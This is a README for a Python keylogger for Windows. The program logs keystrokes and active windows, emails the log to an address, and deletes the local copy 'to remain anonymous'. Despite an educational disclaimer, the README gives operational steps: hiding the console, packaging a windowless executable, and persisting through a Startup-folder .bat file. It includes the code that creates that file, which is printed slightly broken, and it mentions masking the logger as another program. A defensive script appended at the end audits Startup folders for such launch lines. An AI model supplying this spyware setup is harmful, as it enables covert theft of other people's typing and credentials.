/Python-KeyLogger-Windows

A Keylogger written in Python 3.6 that takes in user input from the keyboard, stores the data in a log, and then sends it to an email address. The data log is destroyed after the email is sent to remain anonymous.


This program is primarily used to research how keyloggers work.

Python_KeyLogger_Windows


DISCLAIMER

This program is for educational/research purposes only. The author takes no responsibility and/or liability for how an individual chooses to use any of the source files provided. The author will not be liable for any losses and/or damages in connection to the use of the program and its provided files. By using CSL_KeyLogger_Windows and/or any of its files included, you understand that you are AGREEING TO USE THE PROGRAM AT YOUR OWN RISK. This program is ONLY intended for personal use on a personal pentesting lab, or with consent from an individual of a system being tested.

Windows installation of python modules:

Download the pyWin32 and pyHook modules from here; both libraries are required: https://www.lfd.uci.edu/~gohlke/pythonlibs/

Troubleshooting:

  • Ensure that your Python version matches the module you are installing, or you will get errors when installing the modules.
  • If you get an error, try installing the alternate build of the module for the same Python version. For example, if you download pyHook-1.5.1-cp36-cp36m-win_amd64 and you get an error, then try pyHook-1.5.1-cp36-cp36m-win32.
  • Most errors when installing modules come from either a version mismatch between the module and Python, or pip not being up to date.
  • To update pip: python -m pip install --upgrade pip

Guide on how to install Python Modules on Windows:

Open the Windows Command Prompt as admin:
  • Change to the D drive if your Python executable is there (in my case it is on the D drive): d:
  • Change directory to the Python exe: cd D:\YourPath\venv\Scripts
  • Now install the pyHook module from this directory with pip (my path is the following, change the path to wherever you have stored the .whl module): py -3.6 -m pip install C:\Users\YourPath\pyHook-1.5.1-cp36-cp36m-win32.whl
  • Now install the pyWin32 module from this directory with pip (my path is the following, change the path to wherever you have stored the .whl module): py -3.6 -m pip install C:\Users\YourPath\pywin32-223-cp36-cp36m-win32.whl
 


Troubleshooting:

  • SMTPAuthenticationError when sending mail using Gmail, FIX:
When using Google's mail server, sign-in attempts from the Python program are blocked for the email account you are using unless better security standards are in place. Because of this, access for less secure apps needs to be enabled so that the Python program can send emails to this Gmail account.

Sign in to the Gmail account that you want to use with the Python program, and press the Turn On toggle button: https://www.google.com/settings/security/lesssecureapps

  • Python IDLE issues, keylogger is not picking up keys, FIX:
If you are dealing with this issue in IDLE, delete the contents of the .idlerc folder located within your user profile. To find the folder, check your user profile name followed by %APPDATA% and look for a folder called ".idlerc". Delete everything in that folder, and you should be able to run the program through Python IDLE.

Output:

Running the Program: Open IDLE, PyCharm, or whatever text editor or IDE you prefer for Python and run the program. The Python program prints the values it picks up from the key presses using print statements. This is a good way to see how the keylogger works. If you want to hide the DOS shell window that appears when running the Python program, change the file extension from ".py" to ".pyw".

Here is an example of the program running. This is the output after first going to notepad and typing some words, then going to google. This is to show how the program marks the windows/programs the target is currently on.

This is how the log file(s) store the logged keys:

This is the sent keys logged to the email specified:


Creating the Executable:

To create the executable file, use the Python module pyinstaller. This allows the program to be run anywhere. The first thing required is the pyinstaller module, so install it using pip:
pip install pyinstaller

Then type the following command on your windows command prompt to create the executable:

pyinstaller -w -F name_of_python_script.py

The -w prevents the prompt window from opening, while -F ensures that the executable is a single file that includes everything, rather than a folder. Once that's done, navigate to the dist folder within the folder of your newly created Python script, and grab the exe file.

The file is now created.


Persistently Run KeyLogger on Startup:

On Windows devices there is a startup folder that determines which applications will run on startup. This folder is where some exploiters will store their keyloggers; in some cases they will mask it as another program. Essentially, this is done by implementing a Python function that creates a bat file that runs the 'start' command followed by the file path to the keylogger. Alternatively, a general bat file stored in the startup folder that contains the script shown further below will work.

Here is the python function that can be included in the program which creates the bat file. (I have included the full program with log deletion and bat startup under "key_log_win_withBATCreation.pyw"):

import getpass as gp
usern = gp.getuser()

def bat_create_file(path_log=""): bat_path = r'C:\Users%s\YourPath\Startup' % usern with open(bat_path + '\' + "open.bat", "w+") as bat_file: bat_file.write(r'start "" %s' % path_log)

bat_create_file(path_log)

Sometimes a separate bat file is used instead of having a built-in function:
REM Place in startup folder
start "" path_log/myProgram.exe
exit
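
From the defender's side, the persistence described in this section leaves a visible artifact: a .bat file in a Startup folder whose `start` line launches an executable. The following is an added example, not part of this repository, that audits a folder for that pattern. The function name `audit_startup_dir`, the extension sets, and the sample files are assumptions constructed for illustration; pass it the Startup folders of the system being examined.

```python
import re
import tempfile
from pathlib import Path

# Script types that run automatically when placed in a Startup folder.
SCRIPT_EXTS = {".bat", ".cmd"}
# Launch targets worth an analyst's attention (assumed list, extend as needed).
RISKY_TARGET_EXTS = {".exe", ".scr", ".py", ".pyw"}
# Matches: start ["title"] target   (target may be quoted or bare)
START_RE = re.compile(
    r'^\s*@?start\s+(?:"[^"]*"\s+)?(?:"([^"]+)"|(\S+))', re.IGNORECASE
)


def audit_startup_dir(startup_dir):
    """Return one finding per `start` line that launches a risky target."""
    findings = []
    for script in sorted(Path(startup_dir).iterdir()):
        if not script.is_file() or script.suffix.lower() not in SCRIPT_EXTS:
            continue
        text = script.read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            match = START_RE.match(line)
            if not match:
                continue
            target = match.group(1) or match.group(2)
            # Normalise separators so the suffix is found on any host OS.
            ext = Path(target.replace("\\", "/")).suffix.lower()
            if ext in RISKY_TARGET_EXTS:
                findings.append(
                    {"script": script.name, "line": lineno, "target": target}
                )
    return findings


def demo():
    """Audit constructed sample files written to a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed sample mirroring the bat file shown in this README.
        Path(tmp, "open.bat").write_text(
            'REM Place in startup folder\nstart "" path_log/myProgram.exe\nexit\n'
        )
        # Constructed benign sample: no program launch.
        Path(tmp, "notes.bat").write_text("REM nothing to run\necho hello\n")
        return audit_startup_dir(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Each finding names the script, the line number, and the launch target, which gives an analyst the path of the binary to triage next.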